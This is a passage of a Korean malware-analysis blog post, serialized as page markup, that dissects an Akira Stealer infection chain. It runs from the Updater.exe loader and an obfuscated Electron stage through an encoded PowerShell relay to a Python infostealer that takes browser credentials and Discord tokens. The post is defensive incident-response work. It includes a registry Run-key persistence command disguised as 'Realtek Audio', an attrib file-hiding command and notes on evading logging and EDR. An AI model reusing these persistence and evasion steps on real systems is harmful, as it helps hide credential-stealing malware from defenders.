부스터\"",[606,901,902,903],{},"특정 사용자 관심사(예: 암호화폐 관련 도구나 Discord 확장)를 노린 ",[539,904,905],{},"악성 브라우저 확장",[532,907,908],{},"다만 이는 추측에 머무릅니다.",[532,910,911,912,915],{},"조사 과정에서 확인된 드로퍼, 피싱 이메일, 침해된 웹사이트는 식별되지 않았습니다. 멀웨어 아키텍처와 실행 체인은 완전히 재구성되었지만, ",[539,913,914],{},"최초 침해 지점(MITRE ATT&CK T1190 / T1566)"," 은 검증할 수 없었습니다.",[861,917,919,920,922],{"id":918},"_212-updaterexe-초기-로더","2.1.2 ",[550,921,573],{}," – 초기 로더",[532,924,867],{},[532,926,927,928,930],{},"Microsoft 365 Defender에서 프로세스 트리를 검토할 때, ",[550,929,573],{},"는 즉시 눈에 띄었습니다. 그것이 한 일 때문이 아니라, 시스템의 실행 흐름에 얼마나 조용히 스며들었는지 때문이었습니다.",[532,932,933],{},"이 바이너리는 표준 Windows Run 키를 통해 자동 실행되도록 등록되어 있었습니다:",[587,935,938],{"className":936,"code":937,"language":592},[590],"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\n",[550,939,937],{"__ignoreMap":593},[532,941,942],{},"이는 사용자가 세션에 로그인할 때마다 실행된다는 것을 의미합니다. 상승된 권한이 필요 없고 EDR 텔레메트리에서 종종 눈에 띄지 않고 넘어가는 전형적인 지속성 메커니즘입니다.",[603,944,945,951,957,963,969],{},[606,946,947,950],{},[539,948,949],{},"파일 유형",": Windows PE 실행 파일(32비트)",[606,952,953,956],{},[539,954,955],{},"서명",": 서명 없음",[606,958,959,962],{},[539,960,961],{},"VirusTotal 탐지",": 분류 시점 기준 69개 엔진 중 1개",[606,964,965,968],{},[539,966,967],{},"실행 컨텍스트",": 중간 무결성, 사용자 세션",[606,970,971,974,975],{},[539,972,973],{},"위치",": ",[550,976,977],{},"AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\",[532,979,980],{},"파일 자체는 작고 깔끔하게 컴파일되었으며 정적 분석 관점에서 특이점이 없었습니다. 의심스러운 문자열도, 암호화된 섹션도, 난독화나 패킹의 지표도 없었습니다. 최소한의 표준 Windows API 함수 집합만 가져왔고, 삽입된 페이로드도 포함하지 않았습니다.",[532,982,983,984,986,987,989],{},"그러나 그 동작은 더 많은 것을 시사했습니다. 실행되자마자 ",[550,985,573],{},"는 번들된 아카이브에서 Electron 애플리케이션을 추출했습니다. 표준 Electron 도구를 사용해 패키징된 독립형 NodeJS 런타임이었습니다. 이 압축 해제된 폴더에는 ",[550,988,577],{},"라는 실행 파일이 들어 있었고, 이후 자식 프로세스로 실행되었습니다.",[587,991,994],{"className":992,"code":993,"language":592,"meta":593},[590],"Updater.exe → main.exe\n",[550,995,993],{"__ignoreMap":593},[532,997,998,999,1001,1002,1004],{},"이 단계에서는 네트워크 지표도, 프로세스 인젝션도, 권한이나 토큰 상승의 이상 징후도 없었습니다. ",[550,1000,573],{},"의 전체 역할은 로더의 역할, 즉 은닉성과 모듈성을 유지하려는 목적으로 2단계 구성 요소(",[550,1003,577],{},")를 환경에 전달하는 것으로 보였습니다.",[532,1006,1007],{},"이러한 종류의 아키텍처적 분리는 현대의 상용 멀웨어와 스틸러 툴킷에서 흔합니다. 초기 로더는 단순한 배포 스텁 역할을 하며, 종종 난독화되고 인터프리트되거나 동적으로 생성되는 더 무거운 로직을 이후 단계에 담아 둡니다.",[532,1009,1010,1011,1013,1014,1016,1017,1019],{},"이 사례에서 ",[550,1012,573],{},"는 정확히 그 목적을 수행했습니다. 눈에 띄지 않게 섞여들어 탐지되지 않은 채 남아 있으면서, ",[550,1015,577],{},"와 궁극적으로 ",[550,1018,584],{},"에서 실제 스틸러 로직이 실행되도록 길을 닦는 조용한 초기 발판이었습니다.",[532,1021,1022],{},"자신의 디렉터리를 벗어나 파일 시스템을 건드리지 않았고 어떤 행위 규칙도 트리거하지 않았지만, 그것은 길고 치밀하게 구성된 공격 체인의 첫 번째 도미노였습니다.",[861,1024,1026,1027,1029],{"id":1025},"_213-mainexe-난독화된-nodejs-페이로드-컨테이너","2.1.3 ",[550,1028,577],{}," – 난독화된 NodeJS 페이로드 컨테이너",[532,1031,867],{},[532,1033,1034,1036,1037,1039],{},[550,1035,573],{},"가 실행된 뒤, ",[550,1038,577],{},"라는 2단계 바이너리가 실행되었습니다. 이 구성 요소는 표준 Electron 애플리케이션, 즉 Node.js와 Chromium을 번들링한 런타임 환경으로 자신을 위장했습니다. 이 런타임은 크로스 플랫폼 데스크톱 앱에 흔히 사용됩니다. 이처럼 무해해 보이는 성격이 잘못된 손에 들어갔을 때 그것을 위험하게 만드는 요소 중 하나입니다.",[532,1041,1042,1043,1045,1046,1049],{},"검사 결과 ",[550,1044,577],{},"에는 ",[550,1047,1048],{},"app.asar","라는 내부 아카이브가 들어 있었습니다. Electron 기반 애플리케이션의 표준 패키징 형식입니다. 하지만 정상 Electron 앱과 달리, 이 아카이브의 내용물은 전혀 평범하지 않았습니다.",[603,1051,1052,1058,1064,1072],{},[606,1053,1054,1057],{},[539,1055,1056],{},"플랫폼",": Electron(Node.js + Chromium)",[606,1059,1060,1063],{},[539,1061,1062],{},"아키텍처",": 64비트 Windows",[606,1065,1066,974,1069,1071],{},[539,1067,1068],{},"콘텐츠 구조",[550,1070,1048],{}," 내에 삽입된 JavaScript 파일",[606,1073,1074,1077,1078,1081],{},[539,1075,1076],{},"난독화 수준",": 높음 — 상용 JavaScript 난독화 툴킷인 ",[550,1079,1080],{},"js-confuser","를 통해 달성됨",[532,1083,1084,1085,1087],{},"디컴파일하고 역난독화하자 ",[550,1086,577],{},"의 핵심 로직이 드러났습니다. 그 목적은 GUI를 제공하거나 프론트엔드 로직을 실행하는 것이 아니라, 숨겨진 실행 오케스트레이터로 작동하는 것이었습니다.",[532,1089,1090],{},[539,1091,1092],{},"관찰된 동작:",[603,1094,1095,1098,1104],{},[606,1096,1097],{},"JavaScript 페이로드 내에 저장된 Base64 인코딩 PowerShell 명령을 복호화하고 재구성합니다",[606,1099,1100,1103],{},[550,1101,1102],{},"cmd.exe","를 생성해 PowerShell 명령을 인라인으로 실행합니다",[606,1105,1106,1107,1109,1110,1113],{},"그 PowerShell 명령은 다시 ",[550,1108,552],{},"를 호출하여, 무해해 보이는 디렉터리 구조(",[550,1111,1112],{},"Crypto\\Util\\astor.py",") 아래에 위치한 스크립트를 전달합니다",[587,1115,1118],{"className":1116,"code":1117,"language":592,"meta":593},[590],"main.exe → cmd.exe /d /s /c powershell → python.exe Crypto\\Util\\astor.py\n",[550,1119,1117],{"__ignoreMap":593},[532,1121,1122],{},"이러한 연쇄는 공격자가 실행 컨텍스트를 전환하고 단순한 탐지를 회피할 수 있게 했습니다. 페이로드가 난독화되고 메모리에서 스테이징되었기 때문에, 전통적인 시그니처 기반 통제는 효과가 없었습니다.",[532,1124,1125],{},"Electron 프레임워크는 이상적인 은폐 수단을 제공했습니다. 정밀 조사를 피하면서 임의의 JavaScript를 실행할 수 있게 해 주었습니다. JavaScript 기반 실행은 또한 크로스 플랫폼 호환성을 도입하여, 유연한 배포와 동적 제어 로직의 더 쉬운 통합을 가능하게 했습니다.",[532,1127,1128,1130],{},[550,1129,577],{},"를 특히 위험하게 만든 점은 이미 스테이징된 것 외에 추가 파일을 드롭하지 않고 작동할 수 있는 능력이었습니다. 스틸러 스크립트는 디스크에서 직접 호출되었지만, 모든 스테이징 및 실행 로직은 Electron 번들 안에 삽입된 채로 남아 있었습니다.",[532,1132,1133,1134,1136,1137,1139],{},"요약하면, ",[550,1135,577],{},"는 난독화된 다층 실행 코어로 기능했습니다. 초기 지속성과 ",[550,1138,584],{},"에서의 Akira Stealer 페이로드 완전 활성화 사이의 게이트키퍼 역할을 했습니다.",[861,1141,1143,1144,1146],{"id":1142},"_214-cmdexe-및-powershell-릴레이","2.1.4 ",[550,1145,1102],{}," 및 PowerShell 릴레이",[532,1148,867],{},[532,1150,1151],{},"실행 체인의 이 단계는 릴레이로 기능했습니다. 페이로드 로직을 위한 것이 아니라 난독화와 우회를 위한 것이었습니다.",[532,1153,1154,1156,1157,1159,1160,1163],{},[550,1155,577],{},"가 페이로드를 압축 해제하고 디코딩하는 역할을 마친 뒤, ",[550,1158,1102],{}," 프로세스를 생성했습니다. 이 프로세스 자체는 어떤 악성 로직도 포함하지 않았고, 파일을 쓰거나 수정하지도 않았습니다. 그 유일한 목적은 ",[539,1161,1162],{},"인코딩된 명령","으로 PowerShell 세션을 실행하기 위한 래퍼 역할을 하는 것이었습니다.",[532,1165,1166],{},"이 방법은 가시성을 줄이고 탐지를 회피하기 위해 잘 알려진 전술입니다:",[603,1168,1169,1181],{},[606,1170,1171,1174,1175],{},[539,1172,1173],{},"실행 체인",":",[587,1176,1179],{"className":1177,"code":1178,"language":592},[590],"main.exe → cmd.exe /d /s /c \"powershell -EncodedCommand \u003CBase64Payload>\"\n",[550,1180,1178],{"__ignoreMap":593},[606,1182,1183,1174,1186],{},[539,1184,1185],{},"목적",[603,1187,1188,1191,1194],{},[606,1189,1190],{},"PowerShell 실행을 추가 셸 안에 캡슐화합니다",[606,1192,1193],{},"실제 PowerShell 코드를 로그에서 직접 보이지 않게 숨깁니다",[606,1195,1196,1197,1200],{},"의심스러운 매개변수와 함께 ",[550,1198,1199],{},"powershell.exe","를 직접 사용할 때 트리거되는 EDR를 회피합니다",[532,1202,1203,1204,1206],{},"PowerShell 스크립트를 Base64 인코딩 문자열로 삽입하고 ",[550,1205,1102],{},"를 통해 호출함으로써, 공격자는 여러 형태의 탐지를 회피했습니다:",[603,1208,1209,1214,1219],{},[606,1210,1211],{},[539,1212,1213],{},"명령줄 휴리스틱 필터",[606,1215,1216],{},[539,1217,1218],{},"표준 로깅(예: Event ID 4104, 4688)",[606,1220,1221],{},[539,1222,1223,619,1226,1229,1230,1232],{},[550,1224,1225],{},"-NoProfile",[550,1227,1228],{},"-ExecutionPolicy Bypass"," 같은 ",[550,1231,1199],{}," 인수나 인라인 스크립트에 대한 규칙 기반 탐지",[532,1234,1235,1236,1238,1239,1241],{},"특히 이 PowerShell 명령은 최소화되어 있었고, 삽입된 스틸러 스크립트 ",[550,1237,584],{},"의 경로로 ",[550,1240,552],{},"를 실행하는 데에만 초점이 맞춰져 있었습니다. 추가 모듈은 로드되지 않았고, 메모리에서 눈에 띄는 시그니처도 없었습니다.",[532,1243,1244],{},"이 릴레이 기법은 레드팀 활동과 정교한 인포스틸러 모두에서 흔히 사용됩니다. 구현하기 쉽지만 텔레메트리 상관 분석 없이는 잡기 어려운 경량 회피 계층 역할을 합니다.",[532,1246,1010,1247,1249],{},[550,1248,1102],{},"는 정확히 그 목적을 수행했습니다. JavaScript 로직과 Python 실행 사이의 단순하고 조용한 다리였으며, 거의 눈에 띄지 않고 넘어갈 뻔했습니다.",[861,1251,1253,1254,557,1256],{"id":1252},"_215-pythonexe와-astorpy","2.1.5 ",[550,1255,552],{},[550,1257,584],{},[532,1259,867],{},[532,1261,1262,1263,1265,1266,1268],{},"실행 체인의 마지막이자 가장 영향력 있는 단계는 ",[550,1264,552],{},"가 ",[550,1267,584],{},"를 호출할 때 도달했습니다. 완전히 메모리에서 작동하는 Python 기반 모듈형 인포스틸러였습니다. 이 스크립트는 전체 공격 체인의 운영 핵심을 대표했습니다.",[532,1270,1271,1272,1274],{},"많은 상용 스틸러와 달리, ",[550,1273,584],{},"는 평문으로 배포되지 않았습니다. 다층 복호화 메커니즘으로 보호되어 있었습니다:",[603,1276,1277,1287],{},[606,1278,1279,1282,1283,1286],{},[539,1280,1281],{},"복호화 스택",": 파일은 먼저 GZIP으로 압축된 뒤 ",[539,1284,1285],{},"AES-256-CBC","로 암호화되었습니다.",[606,1288,1289,1292],{},[539,1290,1291],{},"키 파생",": PBKDF2 기반 키 파생 과정(SHA-512, 1,000,000회 반복)이 사용되어, 정적 분석과 무차별 대입을 매우 비현실적으로 만들었습니다.",[532,1294,1295],{},"런타임에 복호화되면, 스크립트는 모두 민감한 데이터 소스를 노리는 여러 전문 모듈을 실행했습니다:",[532,1297,1298],{},[539,1299,1300],{},"핵심 기능",[603,1302,1303,1309,1319,1329],{},[606,1304,1305,1308],{},[539,1306,1307],{},"브라우저 데이터 추출",": Chromium 기반 브라우저(Chrome, Edge, Brave, Opera)에서 로그인 자격 증명, 쿠키, 자동 완성 데이터를 회수합니다",[606,1310,1311,1314,1315,1318],{},[539,1312,1313],{},"토큰 수집",": 특히 ",[539,1316,1317],{},"Discord","에서 세션 토큰을 수집하고, 암호화폐 지갑 확장을 스캔합니다",[606,1320,1321,1324,1325,1328],{},[539,1322,1323],{},"데이터 패키징",": 수집한 모든 데이터를 구조화된 ",[539,1326,1327],{},"ZIP 아카이브","로 집계하며, 공격자 측 파싱을 위해 디렉터리 및 파일 컨텍스트를 보존합니다",[606,1330,1331,1334],{},[539,1332,1333],{},"유출",": 결과 아카이브를 공개 API와 인프라에 업로드합니다.",[532,1336,1337],{},[539,1338,967],{},[532,1340,1341],{},"전체 스틸러 로직은 메모리에서 실행되었으며, 디스크에 영구 파일을 쓰지 않았습니다. 프로세스 내 메모리 아티팩트와 표준 하위 프로세스 호출 외에는 최소한의 텔레메트리 흔적만 남겼습니다. 이 단계에서 지속성을 확립하려는 시도는 없었습니다. 목표는 빠르고 효율적이며 조용한 데이터 탈취였습니다.",[532,1343,1344],{},"유출에 정상 API를 사용한 점 또한 탐지와 차단을 훨씬 어렵게 만들었습니다. 아웃바운드 트래픽이 일상적인 인터넷 활동에 섞여 들었기 때문입니다.",[532,1346,1347,1348,1350],{},"이 단계는 궁극적으로 멀웨어의 정체를 확인시켜 주었습니다. ",[539,1349,649],{},"의 변종으로, 다음으로 알려져 있습니다:",[603,1352,1353,1356,1359,1362],{},[606,1354,1355],{},"높은 모듈성",[606,1357,1358],{},"런타임 난독화",[606,1360,1361],{},"Telegram을 통한 상업적 배포",[606,1363,1364],{},"자격 증명 수집과 토큰 기반 세션 하이재킹에 대한 강한 집중",[532,1366,1367,1368,1370],{},"앞선 단계들과 함께, ",[550,1369,584],{},"는 은밀하고 잘 설계된 인포스틸러 체인의 결정적 종착점을 형성했습니다. 다음 섹션에서는 이 구성 요소를 더 자세히 해부하고, 우리가 그 로직을 어떻게 역분석하고, 인프라를 매핑하며, 그 작전에 사용된 모든 침해 지표를 복구했는지 설명합니다.",[528,1372,1374,1375],{"id":1373},"_3-심층-분석-updaterexe","3. 심층 분석: ",[550,1376,573],{},[532,1378,534],{},[532,1380,1381,1383],{},[550,1382,573],{},"는 침해 후 분석에서 관찰된 최초 바이너리였습니다. 중립적인 외양과 미미한 탐지 흔적에도 불구하고, 멀웨어의 운영 지속성을 유지하고 다음 단계 페이로드를 전달하는 데 중요한 역할을 했습니다.",[713,1385,1387],{"id":1386},"_31-속성","3.1 속성",[532,1389,719],{},[1391,1392,1393,1406],"table",{},[1394,1395,1396],"thead",{},[1397,1398,1399,1403],"tr",{},[1400,1401,1402],"th",{},"속성",[1400,1404,1405],{},"값",[1407,1408,1409,1420,1430,1440,1450,1460],"tbody",{},[1397,1410,1411,1417],{},[1412,1413,1414],"td",{},[539,1415,1416],{},"형식:",[1412,1418,1419],{},"Windows Portable Executable (PE32)",[1397,1421,1422,1427],{},[1412,1423,1424],{},[539,1425,1426],{},"아키텍처:",[1412,1428,1429],{},"x86-64",[1397,1431,1432,1437],{},[1412,1433,1434],{},[539,1435,1436],{},"크기:",[1412,1438,1439],{},"~154 KB",[1397,1441,1442,1447],{},[1412,1443,1444],{},[539,1445,1446],{},"엔트로피:",[1412,1448,1449],{},"정상(비패킹)",[1397,1451,1452,1457],{},[1412,1453,1454],{},[539,1455,1456],{},"서명:",[1412,1458,1459],{},"없음",[1397,1461,1462,1467],{},[1412,1463,1464],{},[539,1465,1466],{},"VirusTotal 탐지:",[1412,1468,1469],{},"분석 시점 기준 1/69",[532,1471,1472],{},"이 파일은 깨끗한 임포트 테이블을 보였고 삽입된 문자열 지표가 없었습니다. 알려진 패커, 크립터, 런타임 난독화 메커니즘은 탐지되지 않았습니다. 그 구조는 맞춤 컴파일된 바이너리와 일치했습니다.",[713,1474,1476],{"id":1475},"_32-행위-분석","3.2 행위 분석",[532,1478,719],{},[532,1480,1481],{},[539,1482,1483],{},"사용자 상호작용 불필요",[532,1485,1486,1487,1489],{},"멀웨어 체인은 어떤 사용자 상호작용도 없이 실행되었습니다. Defender의 프로세스 텔레메트리에 근거할 때, 최초 바이너리(",[550,1488,573],{},")는 자동으로 실행되었으며, 가장 가능성이 높은 것은 레지스트리 자동 실행 키 같은 지속성 메커니즘을 통한 것이었습니다. 그러나 침해가 오래되었고 과거 이벤트 로그가 없었기 때문에, 정확한 지속성 방법은 복구할 수 없었습니다.",[532,1491,1492],{},[539,1493,1494],{},"조용한 실행 및 스테이징",[532,1496,1497,1498,1500,1501,1503],{},"실행 시 ",[550,1499,573],{},"는 시각적 창이나 사용자 프롬프트 없이 즉시 ",[550,1502,577],{},"를 실행했습니다. 스테이징은 백그라운드에서 조용히 이루어졌습니다. 사용자 동의 대화상자, UAC 프롬프트, GUI 구성 요소의 흔적은 없었습니다.",[532,1505,1506],{},[539,1507,1508],{},"페이로드 배포 동작",[532,1510,1511,1513],{},[550,1512,577],{},"는 Electron 애플리케이션 구조의 일부로 확인되었지만, 그 배포의 정확한 출처는 불분명하게 남아 있습니다. 다음 중 하나로 추정됩니다:",[603,1515,1516,1522],{},[606,1517,1518,1519,1521],{},"페이로드가 ",[550,1520,573],{}," 내부에 번들되어 있었을 수 있습니다(예: 삽입된 리소스), 또는",[606,1523,1524],{},"원격 소스에서 회수되었을 수 있습니다",[532,1526,1527],{},"네트워크 텔레메트리가 없고 하드코딩된 URL도 복구되지 않았기 때문에, Electron 앱의 전달 벡터는 결론에 이르지 못한 채 남아 있습니다.",[532,1529,1530],{},[539,1531,1532],{},"프로세스 체인 동작",[532,1534,1535,1536,1538,1539,1541],{},"실행되자마자 ",[550,1537,573],{},"는 ",[550,1540,577],{},"를 자식 프로세스로 생성했습니다. 이 호출은 비대화형이었고, 체인에서 생성된 어떤 프로세스도 UI 활동을 보이지 않았습니다. 프로세스 체인은 예상대로 이어졌습니다:",[587,1543,1546],{"className":1544,"code":1545,"language":592},[590],"Updater.exe → main.exe → cmd.exe → powershell (encoded) → python.exe astor.py\n",[550,1547,1545],{"__ignoreMap":593},[532,1549,1550],{},"모든 실행 단계는 사용자 입력을 요구하지 않고 작동했으며, 사전 구성된 실행 로직과 조용한 실행 경로에만 의존했습니다. 이는 노출을 최소화했고, 멀웨어가 장기간 탐지되지 않은 채 남아 있도록 도왔습니다.",[713,1552,1554],{"id":1553},"_33-감염-체인에서의-역할","3.3 감염 체인에서의 역할",[532,1556,719],{},[532,1558,1559,1561,1562,1565,1566,1568],{},[550,1560,573],{},"는 더 넓은 감염 체인 안에서 ",[539,1563,1564],{},"단 하나이지만 필수적인 역할","을 했습니다. 2단계 구성 요소인 ",[550,1567,577],{},"의 지속성과 재배포를 담당했습니다.",[532,1570,1571],{},[539,1572,1573],{},"확인된 특성",[603,1575,1576,1582,1587],{},[606,1577,1578,1579],{},"악성 로직을 직접 포함하거나 실행하지 ",[539,1580,1581],{},"않았습니다",[606,1583,1584,1585],{},"어떤 데이터 유출도 수행하지 ",[539,1586,1581],{},[606,1588,1589,1590],{},"브라우저 자격 증명 저장소나 민감한 사용자 데이터와 상호작용하지 ",[539,1591,1581],{},[532,1593,1594,1595,1597],{},"그 유일한 목적은 사용자 로그인 시 ",[550,1596,577],{},"를 조용히 실행하는 것이었으며, 지속성 방법으로는 레지스트리 자동 실행 항목이 가장 가능성이 높았습니다(텔레메트리 제약으로 직접 복구되지는 않았습니다).",[532,1599,1600,1601,1603,1604,1606],{},"격리된 1단계 로더로 작동함으로써, ",[550,1602,573],{},"는 실제 스틸러 페이로드(",[550,1605,584],{},")가 더 깊은 실행 계층에 숨겨진 채로 남아 있도록 보장했습니다. 이러한 임무 분리는 공격자가 다음을 할 수 있게 했습니다:",[603,1608,1609,1612,1615],{},[606,1610,1611],{},"정적 AV나 샌드박스 시스템에 의한 상관 분석 회피",[606,1613,1614],{},"로더를 수정하지 않고 페이로드를 교체하거나 업데이트",[606,1616,1617],{},"진입점에서의 행위 신호 감소",[532,1619,1620,1621,1624],{},"이 패턴은 전달 메커니즘이 일반적이고 페이로드가 모듈형이거나 클라이언트별로 맞춤화되는 ",[539,1622,1623],{},"멀웨어 서비스형(MaaS)"," 작전에서 전형적입니다.",[532,1626,1010,1627,1629],{},[550,1628,573],{},"는 신뢰할 수 있고 은밀한 진입점 역할을 하기에 딱 필요한 만큼의 로직만 제공했습니다. 그 이상도 아니지만, 그 이하도 아니었습니다.",[713,1631,1633],{"id":1632},"_34-레지스트리를-통한-지속성astorpy에서-확인됨","3.4 레지스트리를 통한 지속성(astor.py에서 확인됨)",[532,1635,719],{},[532,1637,1638,1639,1641],{},"Python 페이로드의 정적 분석 결과, ",[550,1640,573],{},"가 레지스트리 자동 실행 항목을 사용해 명시적으로 지속된다는 것이 밝혀졌습니다:",[603,1643,1644,1652,1660],{},[606,1645,1646,974,1649],{},[539,1647,1648],{},"레지스트리 경로",[550,1650,1651],{},"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run",[606,1653,1654,974,1657],{},[539,1655,1656],{},"값 이름",[550,1658,1659],{},"Realtek Audio",[606,1661,1662,974,1665],{},[539,1663,1664],{},"페이로드 경로",[550,1666,1667],{},"%APPDATA%\\Microsoft\\Internet Explorer\\UserData\\Updater.exe",[532,1669,1670],{},"해당 레지스트리 명령은 PowerShell을 통해 실행됩니다:",[587,1672,1676],{"className":1673,"code":1674,"language":1675,"meta":593,"style":593},"language-powershell shiki shiki-themes github-light github-dark","reg add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v \"Realtek Audio\" /t REG_SZ /d \"...\\Updater.exe\" /f\n","powershell",[550,1677,1678],{"__ignoreMap":593},[1679,1680,1683],"span",{"class":1681,"line":1682},"line",1,[1679,1684,1674],{},[532,1686,1687],{},"이는 사용자가 로그인할 때마다 멀웨어가 실행되도록 보장합니다. 또한 이 파일은 탐지를 더욱 회피하기 위해 숨김 및 시스템 속성으로 표시됩니다:",[587,1689,1691],{"className":1673,"code":1690,"language":1675,"meta":593,"style":593},"attrib +h +s \"Updater.exe\"\n",[550,1692,1693],{"__ignoreMap":593},[1679,1694,1695],{"class":1681,"line":1682},[1679,1696,1690],{},[532,1698,1699],{},"이 지속성 메커니즘은 astor.py 코드에 직접 삽입되어 있었으며, 이는 최종 단계 스틸러가 디스크와 시작 프로그램 레지스트리에서 로더의 존재를 능동적으로 유지한다는 것을 확인시켜 줍니다.",[713,1701,1703],{"id":1702},"_35-요약","3.5 요약",[532,1705,719],{},[820,1707,1708],{},[532,1709,1710,1712],{},[550,1711,573],{},"는 구조나 내용 자체로는 본질적으로 악성이 아니었지만, 실행 체인 내에서의 맥락적 동작이 멀웨어 로더로서의 역할을 확인시켜 주었습니다.",[826,1714],{"className":1715},[829],[532,1717,1718],{},"이 바이너리는 깔끔하고 최소주의적인 1단계 런처 역할을 했습니다. 정적 분석, AV 엔진, 행위 규칙에 의한 탐지를 회피했습니다. 그 설계는 악성 로직 자체를 실행하는 것이 아니라 오로지 은닉성과 운영 지원에 초점이 맞춰져 있었습니다.",[532,1720,1721,1722,1724,1725,1727,1728,1731],{},"그러나 그 역할은 초기 배포를 넘어섰습니다. ",[550,1723,584],{}," 페이로드를 리버스 엔지니어링하는 과정에서, 우리는 ",[550,1726,573],{},"의 존재를 능동적으로 확인하는 로직을 발견했습니다. 이 확인은 스틸러 코드 내에 구현된 더 넓은 ",[539,1729,1730],{},"상태 점검 및 자가 치유 주기","의 일부였습니다. 감염 체인의 무결성을 검증하고 누락된 구성 요소를 필요 시 복원하도록 설계된 메커니즘입니다.",[532,1733,1734,1735,1737,1738,1741],{},"이는 ",[550,1736,573],{},"가 단지 멀웨어를 시작하는 역할만 한 것이 아니라, 그 ",[539,1739,1740],{},"지속적인 런타임 검증","의 일부를 형성했음을 의미합니다. 이 스텁이 없으면 멀웨어는 향후 세션에서 스스로를 재초기화하는 능력을 잃을 수 있습니다.",[532,1743,1744],{},[539,1745,1746,1748],{},[550,1747,573],{},"의 핵심 기능:",[603,1750,1751,1756,1761,1764],{},[606,1752,1753,1755],{},[550,1754,577],{},"의 원활한 배포",[606,1757,1758,1760],{},[550,1759,584],{},"의 간접 실행",[606,1762,1763],{},"로더와 페이로드 로직의 분리",[606,1765,1766,1767],{},"운영 상태 모니터링의 일부로 ",[539,1768,1769],{},"페이로드 자체에서 참조됨",[532,1771,1772],{},"섹션 5에서는 스틸러의 내부 상태 점검 루틴, 자가 치유 동작, 무결성 검증 메커니즘을 자세히 다룹니다.",[532,1774,1775,1776,1778],{},"지금으로서는 ",[550,1777,573],{},"가 이 계층화된 인포스틸러 아키텍처에서 점화 장치이자 고정점 역할을 했다는 점이 분명합니다.",[713,1780,1782],{"id":1781},"_36-추출-트릭-로더를-앞지르기","3.6 추출 트릭: 로더를 앞지르기",[532,1784,719],{},[532,1786,1787],{},"때로는 최고의 리버스 엔지니어링 성과가 깊은 바이너리 디스어셈블에서 나오는 것이 아니라, 약간의 잔꾀와 인내에서 나옵니다.",[532,1789,1790,1791,1793,1794,1796],{},"통제된 실험실 환경에서 감염을 분석하던 중, 우리는 이상한 점을 발견했습니다. ",[550,1792,573],{},"는 존재하며 실행 중이었지만, ",[550,1795,577],{},"는 파일 시스템에서 사라져 있었습니다. 그때 한 가지 아이디어가 떠올랐습니다. 멀웨어가 스스로를 복구하도록 두면 어떻게 될까?",[532,1798,1799,1800,1802,1803,1808],{},"우리는 ",[550,1801,573],{},"는 손대지 않은 채, 감염된 환경에서 ",[539,1804,1805,1807],{},[550,1806,577],{},"를 의도적으로 삭제","했습니다. 아니나 다를까, 다음 사용자 세션 로그인 후 로더가 작동하기 시작했습니다. 떼를 쓰는 게 아니라, 조용히 2단계를 재구축하려는 시도로 말입니다.",[532,1810,1811,1812,1538,1814,1816,1817,1820,1821,1824,1825,619,1827,1830,1831,1833],{},"흥미로워진 지점은 여기였습니다. ",[550,1813,573],{},[550,1815,577],{},"를 직접 재생성하는 대신, 먼저 ",[550,1818,1819],{},"app-64.7z","라는 파일을 드롭했습니다. 표준 ",[539,1822,1823],{},"7-Zip 아카이브","였습니다. 이 아카이브에는 ",[550,1826,577],{},[550,1828,1829],{},"resources",", 그리고 삽입된 모든 로직이 담긴 ",[550,1832,1048],{}," 페이로드를 포함한 전체 Electron 애플리케이션 구조가 들어 있었습니다.",[532,1835,1836,1837,1840],{},"우리는 사실상 ",[539,1838,1839],{},"멀웨어가 소스 패키지를 우리에게 건네도록 강제","한 셈이었습니다.",[532,1842,1843],{},[747,1844],{"alt":1845,"src":1846},"Suspicious Updater Executable Detected","https://res.cloudinary.com/c4a8/image/upload/v1749797290/blog/pics/updater-exe.png",[532,1848,1849],{},"이 7z 아카이브를 손에 넣자, 우리는 원본 로더를 다시 건드리지 않고도 JavaScript 기반 오케스트레이션 로직을 추출하고, 압축을 풀고, 완전히 역분석할 수 있었습니다. 아카이브 구조는 예상한 Electron 앱 레이아웃과 완벽하게 일치했습니다.",[532,1851,1852,1853,1856],{},"이 동작은 공격자가 아카이브를 유연한 페이로드 컨테이너로 사용하는 ",[539,1854,1855],{},"모듈형이고 유지보수 가능한 아키텍처","를 의도적으로 선택했음을 강하게 시사합니다. 또한 로더 바이너리를 재컴파일하지 않고도 페이로드 구성 요소를 교체하거나 업데이트할 수 있게 했습니다.",[532,1858,1859],{},"그리고 우리의 경우에는? 그것이 그들의 체인을 앞지르고, 드롭을 가로채며, 전체 패키지를 손에 넣고 나올 수 있게 해 주었습니다. 마치 제작자가 보지 않는 사이 작업대에서 설계도를 훔치는 것처럼 말입니다.",[532,1861,1862,1863],{},"이렇게 말할 수 있겠습니다. ",[539,1864,1865,1866,619,1869,1872],{},"때로는 최고의 포렌식 도구는 ",[550,1867,1868],{},"del",[550,1870,1871],{},"wait",", 그리고 약간의 호기심입니다.",[528,1874,1876,1877],{"id":1875},"_4-심층-분석-powbat","4. 심층 분석: ",[550,1878,1879],{},"pow.bat",[532,1881,534],{},[532,1883,1884,1885,1888],{},"분석한 멀웨어 캠페인에서 ",[550,1886,1887],{},"Invoke-SharpLoader"," 구성 요소는 맞춤형 메모리 상주 .NET 로더로 작동하며, 고도로 모듈화되고 회피적인 실행 흐름을 보입니다. 이 섹션에서는 그 내부 아키텍처, AMSI 패칭을 통한 분석 방해 전략, 2단계 페이로드를 촉진하는 역할을 해부합니다.",[713,1890,1892],{"id":1891},"_41-바이너리-속성-sharploader-배치-래퍼","4.1 바이너리 속성 – SharpLoader 배치 래퍼",[532,1894,719],{},[532,1896,1897,1898,1900],{},"메모리에서 .NET 페이로드를 로드하기 위해 실행되기 전, 외부 래퍼 ",[550,1899,1879],{},"은 정적 분석 기준으로 다음과 같은 특성을 보입니다:",[1391,1902,1903,1911],{},[1394,1904,1905],{},[1397,1906,1907,1909],{},[1400,1908,1402],{},[1400,1910,1405],{},[1407,1912,1913,1922,1931,1941,1950,1960,1970,1979],{},[1397,1914,1915,1919],{},[1412,1916,1917],{},[539,1918,1416],{},[1412,1920,1921],{},"DOS 배치 파일",[1397,1923,1924,1928],{},[1412,1925,1926],{},[539,1927,1426],{},[1412,1929,1930],{},"스크립트 기반(컴파일된 바이너리가 아님)",[1397,1932,1933,1938],{},[1412,1934,1935],{},[539,1936,1937],{},"파일 크기:",[1412,1939,1940],{},"27.79 KB (28454 